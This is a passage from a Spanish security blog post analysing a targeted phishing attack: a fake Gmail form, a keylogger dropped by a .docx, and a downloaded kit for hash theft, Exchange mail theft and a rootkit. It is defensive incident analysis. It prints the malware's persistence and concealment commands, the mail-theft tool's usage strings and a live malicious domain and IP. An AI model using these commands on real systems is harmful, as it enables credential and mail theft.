proposito&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;span class="Apple-style-span" style="color: #073763; font-family: 'Courier New', Courier, monospace;"&gt;&lt;span class="Apple-style-span" style="line-height: 19px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;La información nos indica:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-7yaD18d1bBA/Tl42qdkEXDI/AAAAAAAACd4/DKAdqKLlVfE/s1600/Captura+de+pantalla+2011-08-31+a+la%2528s%2529+15.26.36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="237" src="http://1.bp.blogspot.com/-7yaD18d1bBA/Tl42qdkEXDI/AAAAAAAACd4/DKAdqKLlVfE/s400/Captura+de+pantalla+2011-08-31+a+la%2528s%2529+15.26.36.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Es decir el correo parece que tiene su origen desde Taiwan, ahora procedemos a ver el contenido del formulario 'html' previamente&amp;nbsp;descodificado. Esta es la información que ofrece (en color rojo):&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="background-color: #cfe2f3; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"&lt;span class="Apple-style-span" style="color: red;"&gt;http://www.lsbu.ac.uk/php4-cgiwrap/hscweb/cm/login.php&lt;/span&gt;" method=3D"post" target=3D"_blank" ons=&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;ubmit=3D"alert("This form has been disabled."); return false"&amp;gt;{di=&lt;br /&gt;v name=3D"gaia_loginbox"&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #cfe2f3; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;--------------------------------&lt;/span&gt;&lt;/div&gt;&lt;div style="background-color: #cfe2f3; font-family: 'Courier New', Courier, monospace; line-height: 19px;"&gt;&lt;span style="font-size: x-small;"&gt;input name=3D"&lt;span class="Apple-style-span" style="color: red;"&gt;AGALX&lt;/span&gt;" value=3D"&lt;span style="color: red;"&gt;NIE34iN5DAAYY&lt;/span&gt;" type=3D"hidden"&amp;gt;=20&lt;br /&gt;&amp;nbsp;input name=3D"myEmail" size=3D"18" value=3D"&lt;span class="Apple-style-span" style="color: red;"&gt;xxxxxxxxxxxxxxx@gmail.com&lt;/span&gt;" typ=&lt;br /&gt;e=3D"text"&amp;gt;{/td&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Una URL que apunta a un servidor web propiedad de&amp;nbsp;London South Bank University y&amp;nbsp;que nada tiene que ver con los dominios del cliente, revisando el dominio&amp;nbsp;(lsbu.ac.uk),&amp;nbsp;vemos que apunta a una dirección ubicada en Reino Unido. La pregunta es ¿Estará comprometido el servidor?&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-3dpPSAlN00Y/TmD0AvtlUXI/AAAAAAAACd8/yFSYAseXdNY/s1600/Captura+de+pantalla+2011-09-02+a+la%2528s%2529+17.18.31.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://4.bp.blogspot.com/-3dpPSAlN00Y/TmD0AvtlUXI/AAAAAAAACd8/yFSYAseXdNY/s320/Captura+de+pantalla+2011-09-02+a+la%2528s%2529+17.18.31.png" width="202" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="font-family: monospace;"&gt;&lt;span class="Apple-style-span" style="font-size: 12px; line-height: 14px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;A continuación procedo a introducir en el formulario unas credenciales falsas de una cuenta que me he creado previamente en Gmail. También capturo el trafico para ver que información devuelve.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://1.bp.blogspot.com/-oJFUd-IdMoA/TmES7kNNFPI/AAAAAAAACeE/puRTw4Epirk/s1600/Captura+de+pantalla+2011-09-02+a+la%2528s%2529+19.25.41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-oJFUd-IdMoA/TmES7kNNFPI/AAAAAAAACeE/puRTw4Epirk/s1600/Captura+de+pantalla+2011-09-02+a+la%2528s%2529+19.25.41.png" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Si nos fijamos en la captura del tráfico, estamos mandando las claves al atacante y una vez enviadas nos dirige a una url de Google Docs. Lo curioso del tema es que es una url pública a la que se accede sin autenticación.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-5xicTqa0lbw/TmS4jcCe-VI/AAAAAAAACeM/1qtn0gVw3Qg/s1600/Captura+de+pantalla+2011-09-05+a+la%2528s%2529+13.53.17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="130" src="http://1.bp.blogspot.com/-5xicTqa0lbw/TmS4jcCe-VI/AAAAAAAACeM/1qtn0gVw3Qg/s400/Captura+de+pantalla+2011-09-05+a+la%2528s%2529+13.53.17.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Como es de sospechar, hay muchas posibilidades de que nos encontremos con malware, o quizás algún 0 Day. En este punto 'clonamos' y virtualizamos &amp;nbsp;el equipo windows de la persona que dio la alerta a los administradores con objeto de simular de forma precisa el entorno.&lt;br /&gt;&lt;br /&gt;Tras iniciar el entorno virtual y ponernos a analizar el documento procedemos como medida cautelar a descargarlo y enviarlo a Virus Total, con nulos resultados.&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-yhE_F32v7UQ/TmZGWQFnmSI/AAAAAAAACes/p3MzUdNiGCI/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+18.11.44.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="82" src="http://1.bp.blogspot.com/-yhE_F32v7UQ/TmZGWQFnmSI/AAAAAAAACes/p3MzUdNiGCI/s400/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+18.11.44.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;En apariencia no hay malware (0 de 44 motores ), pero lo mejor es ejecutarlo y para ello vamos a proveernos de nuestras mejores tools de nuestra preciada caja de herramientas y añadiré las de Sysinternals con objeto de monitorizar lo que hace en nuestro entorno Windows. Os recomiendo la lectura del blog del grande&amp;nbsp;&lt;a href="http://blogs.technet.com/b/markrussinovich/about.aspx"&gt;Mark Russinovich&lt;/a&gt; el autor de Sysinternals sobre "Analyzing a Stuxnet Infection with the Sysinternals Tools, Part 1, 2, 3"y que podéis leer desde &lt;a href="http://blogs.technet.com/b/markrussinovich/archive/2011/03/30/3416253.aspx"&gt;aquí&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Me dispongo a lanzar el documento y espero unos minutos para que en el mejor de los casos si es un malware le de tiempo al equipo infectarse tranquilamente. Esto es lo que ha ocurrido de una forma resumida.&lt;br /&gt;&lt;br /&gt;El archivo '.docx' da un clásico error de 'runtime' como el siguiente:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-uYoaTSeZ8Kw/TmaBP9YaluI/AAAAAAAACe8/19bbFMM_Tds/s1600/error11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-uYoaTSeZ8Kw/TmaBP9YaluI/AAAAAAAACe8/19bbFMM_Tds/s1600/error11.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Tal y como lo estamos monitorizando, se ha lanzado un proceso de nombre 'file.exe' y se ha creado un fichero '.html' en la siguiente ruta:&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 11px; line-height: 12px;"&gt;&lt;code class="plain" style="background-attachment: initial !important; background-clip: initial !important; background-color: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial initial !important; background-repeat: initial initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;C:\Documents and Settings\KLY\Local Settings\Temp\mhzksbnz.html&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 11px; line-height: 12px;"&gt;&lt;code class="plain" style="background-attachment: initial !important; background-clip: initial !important; background-color: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial initial !important; background-repeat: initial initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-PZTvGn3J4C4/TmYtBuqk2ZI/AAAAAAAACec/zxCPxJ18PcI/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+16.12.30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="313" src="http://3.bp.blogspot.com/-PZTvGn3J4C4/TmYtBuqk2ZI/AAAAAAAACec/zxCPxJ18PcI/s400/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+16.12.30.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 11px; line-height: 12px;"&gt;&lt;code class="plain" style="background-attachment: initial !important; background-clip: initial !important; background-color: initial !important; background-image: none !important; background-origin: initial !important; background-position: initial initial !important; background-repeat: initial initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;br /&gt;&lt;/code&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Revisando los strings del nuevo proceso apunta a que registra las pulsaciones del teclado. ¿será un keylogger?&lt;br /&gt;&lt;br /&gt;El proceso 'file.exe' crea también un fichero 'UpdaterInfo.dat' y diversas librerías .dll y otros diversos ficheros 'html'.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-rk5g7xPwgdU/TmYuWZfew7I/AAAAAAAACek/lJxJTexAqMQ/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+16.18.00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="97" src="http://4.bp.blogspot.com/-rk5g7xPwgdU/TmYuWZfew7I/AAAAAAAACek/lJxJTexAqMQ/s640/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+16.18.00.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;En este momento hago un volcado de memoria utilizando Dumpit de la empresa&amp;nbsp;MoonSols y cuyo fundador es el gran&amp;nbsp;&lt;a href="http://www.moonsols.com/about/"&gt;Matthieu Suiche&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;DumpIt es una fusión de win32dd y win64dd en un único archivo ejecutable. Sólo un doble clic sobre el ejecutable es suficiente para generar una copia de la memoria física en el directorio actual.&lt;br /&gt;&lt;br /&gt;Tras el análisis del fichero de memoria, utilizando las tools de Volatility procedo a extraer el proceso del fichero de memoria y enviarlo a &lt;a href="http://anubis.iseclab.org/"&gt;Anubis&lt;/a&gt; (un analizador de binarios) confirmando que efectivamente se trata de un keylogger. (ver reporte &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=18c5b86f5708779047551d39c43813950&amp;amp;call=first"&gt;aquí&lt;/a&gt;)&lt;br /&gt;&lt;br /&gt;No obstante con objeto de comprobarlo y mirando tal y como indica el informe, efectivamente existe el fichero en la máquina clonada y el contenido de UpdaterInfo.dat contiene todo lo tecleado hasta el momento.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-foLczglfa_g/TmZSdsrW77I/AAAAAAAACe0/EaDSY7HVg-c/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+18.56.47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-foLczglfa_g/TmZSdsrW77I/AAAAAAAACe0/EaDSY7HVg-c/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+18.56.47.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;CONTINUAMOS...&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Seguimos investigando y vemos que el proceso lanza una conexión a internet y por HTTP se conecta al siguiente dominio 'tomitomi.cn - 195.248.234.157' (registrado a nombre de&amp;nbsp;Zhejiang 5 Red interior design company&lt;span class="Apple-style-span" style="color: #666666; font-family: Geneva, Tahoma, sans-serif;"&gt;&lt;span class="Apple-style-span" style="-webkit-border-horizontal-spacing: 2px; -webkit-border-vertical-spacing: 2px; font-size: 12px; line-height: 19px;"&gt;)&amp;nbsp;&lt;/span&gt;&lt;/span&gt;y procede a la descarga de un fichero comprimido de nombre 'gamer.zip'&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-idEqOCpTwBM/TmYiI-8weGI/AAAAAAAACeU/ni44WvqOP1c/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+15.33.28.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="123" src="http://4.bp.blogspot.com/-idEqOCpTwBM/TmYiI-8weGI/AAAAAAAACeU/ni44WvqOP1c/s640/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+15.33.28.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;Este fichero se almacena en la carpeta 'temp' y contiene a su vez los siguientes ficheros:&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;iam.exe&amp;nbsp;&lt;/li&gt;&lt;li&gt;iam.dll&amp;nbsp;&lt;/li&gt;&lt;li&gt;m.exe&amp;nbsp;&lt;/li&gt;&lt;li&gt;r.exe&lt;/li&gt;&lt;li&gt;y.exe&lt;/li&gt;&lt;li&gt;sas.bat&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;Los ficheros 'iam.exe' e 'iam.dll', son detectados por virustotal como herramientas de Hacking, el fichero 'y.exe' es detectado por 25 motores de 41 como malware y los demás archivos no son detectados por ninguno de los motores.&amp;nbsp;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;&lt;b&gt;IAM.EXE - IAM.DLL&lt;/b&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;Los ficheros 'iam.exe' e 'iam.dll' no son exactamente malware y pertenecen a un conjunto de herramientas de la empresa CORE SECURITY. Estos ficheros (según se indica en la &lt;a href="http://oss.coresecurity.com/projects/pshtoolkit.htm"&gt;&lt;span style="color: #1a37ee; text-decoration: underline;"&gt;web&lt;/span&gt;&lt;/a&gt;) permite cambiar en memoria las credenciales NTLM asociados con la sesión actual de Windows, es decir el nombre de usuario, dominio y hashes.&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;Todo apunta a que este 'raro-ware' esta pensado para robar las credenciales de los usuarios.&amp;nbsp;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;&lt;b&gt;M.EXE&lt;/b&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;'m.exe' es una variación de '&lt;a href="http://pages.interlog.com/~tcharron/getmail.html"&gt;&lt;span style="color: #1a37ee; text-decoration: underline;"&gt;getmail&lt;/span&gt;&lt;/a&gt;' y sirve para recuperar mensajes de correo electrónico&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;He adjuntado los dos 'strings' de ambos, con objeto de ver si contiene algo interesante y vaya si lo tiene.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-i4y_YFzDJqk/TmZEylL4HXI/AAAAAAAACeo/iL45b_0Q6kQ/s1600/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+18.04.45.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="353" src="http://1.bp.blogspot.com/-i4y_YFzDJqk/TmZEylL4HXI/AAAAAAAACeo/iL45b_0Q6kQ/s640/Captura+de+pantalla+2011-09-06+a+la%2528s%2529+18.04.45.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;'m.exe' se puede utilizar para recuperar mensajes de correo electrónico de un servidor Exchange.&amp;nbsp;El uso según los 'strings' es el siguiente:&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;Ejemplo:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;%s -s:sn-server1.mailserver.com -u:exuser4 -t:2011-7-25-14 -o:c:\winnt\temp&lt;/div&gt;&lt;div&gt;%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Es necesario especificar el nombre de usuario, nombre del servidor, rango de fechas y la ubicación donde guardar los correos robados. Una vez lanzado al servidor Exchange&amp;nbsp;los mensajes de correo electrónico se convertirá en texto y archivos adjuntos guardados en carpetas.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;&lt;b&gt;R.EXE&lt;/b&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px;"&gt;El ejecutable 'r.exe' es el archivo 'rar.exe' de Winrar, dado que no tiene huella para comprobar su integridad, procedo a descargarlo y aplicar la huella en MD5 y SHA1 coincidiendo ambas dos y dado que no me fío vuelvo a pasarlo por Virustotal y varios analizadores de binarios. También comparo los strings, aparentemente es el mismo fichero.&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-KZhX21yp-jo/TmdqThLx5qI/AAAAAAAACfM/hPWiFtonty0/s1600/Captura+de+pantalla+2011-09-07+a+la%2528s%2529+11.56.36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-KZhX21yp-jo/TmdqThLx5qI/AAAAAAAACfM/hPWiFtonty0/s1600/Captura+de+pantalla+2011-09-07+a+la%2528s%2529+11.56.36.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;b&gt;Y.EXE&lt;/b&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;'y.exe' añade al sistema funcionalidades de rootkit, ya que registra los procesos que se ejecutan al iniciar el sistema, crea archivos en el directorio Windows, modifica partes del registro y sustituye comandos de sistema operativo.&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;Entre ellos crea el fichero 'C:\WINDOWS\system32\prxy.dll' y un archivo por lotes de nombre 'sas.bat' a continuación se c&lt;span class="Apple-style-span" style="font-size: small;"&gt;rea un proceso basando en 'cmd.exe' con el siguiente comando 'cmd /c rundll32 prxy.dll,RundllInstall' y con&amp;nbsp;&lt;/span&gt;los posteriores comandos:&lt;/div&gt;&lt;div style="font: 16.0px Times; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 19.0px;"&gt;&lt;br /&gt;&lt;/div&gt;cmd /c attrib +h +s prxy.dll&lt;br /&gt;cmd /c net start bits&lt;br /&gt;cmd /c net stop bits&lt;br /&gt;cmd /c rundll32 prxy.dll,RundllInstall&lt;br /&gt;prxy.dll&lt;br /&gt;cmd /c sas.bat&lt;br /&gt;del %s&lt;br /&gt;del %s /as&lt;br /&gt;ping 127.0.0.1 -n 3&lt;br /&gt;del sas.bat&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;b&gt;PRXY.DLL&lt;/b&gt;&lt;br /&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;br /&gt;Creado por 'Y.EXE' parece que reemplaza el servicio legitimo BITs de windows ubicado en la siguiente rama del registro:&lt;br /&gt;&lt;br /&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;div&gt;'prxy.dll' parece que permite la descarga de software sin que los antivirus o cortafuegos hagan algo al respecto, dado que al tratarse de un servicio legitimo estos permiten la entrada y salida de trafico hacia internet. (esto no lo tenemos claro todavía)&lt;br /&gt;&lt;br /&gt;&lt;b&gt;SAS.BAT&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Como su nombre indica es un fichero de proceso por lotes y quizás este es el mas sorprendente de los ficheros analizados por el contenido.&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-uLJMoIOvDdM/Tmh4uJuaHkI/AAAAAAAACfU/b7us5YMK0vo/s1600/Captura+de+pantalla+2011-09-08+a+la%2528s%2529+10.10.57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-uLJMoIOvDdM/Tmh4uJuaHkI/AAAAAAAACfU/b7us5YMK0vo/s1600/Captura+de+pantalla+2011-09-08+a+la%2528s%2529+10.10.57.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Se puede apreciar que este fichero es parte de otro y que su objetivo es capturar hashes y contraseñas. Una vez las obtiene (al igual que los correos en formato texto) se propone a empaquetarlas en un archivo que no ofrezca sospechas como ~WRD0100.tmp. He de decir que no se han encontrado los ejecutables 'PWDumpx.exe'.&lt;br /&gt;&lt;br /&gt;Si descomprimimos el archivo&amp;nbsp;~WRD0100.tmp nos encontramos con lo siguiente:&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-UbCqlJMOBBA/TmaIjExXEUI/AAAAAAAACfA/NyNzP7IwqWk/s1600/maillog.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="250" src="http://1.bp.blogspot.com/-UbCqlJMOBBA/TmaIjExXEUI/AAAAAAAACfA/NyNzP7IwqWk/s320/maillog.JPG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Un montón de correos electrónicos, presumiblemente lanzados por el ejecutable 'm.exe'&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div&gt;&lt;b&gt;CONSIDERACIONES&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Aunque no hemos realizado ingeniería inversa de la mayoría de los ejecutables (estamos todavía en ello) podemos determinar que disponemos de un montón de evidencias de que la empresa ha sido víctima presumiblemente de un ataque auto-dirigido.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;¿QUE HA OCURRIDO?&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Bueno aunque con este desglose todavía es pronto para dar unas conclusiones exactas de lo ocurrido, me atrevo a decir lo siguiente:&lt;br /&gt;&lt;br /&gt;Los hackers, han lanzado un ataque auto-dirigido con objeto de comprometer las cuentas de Gmail y 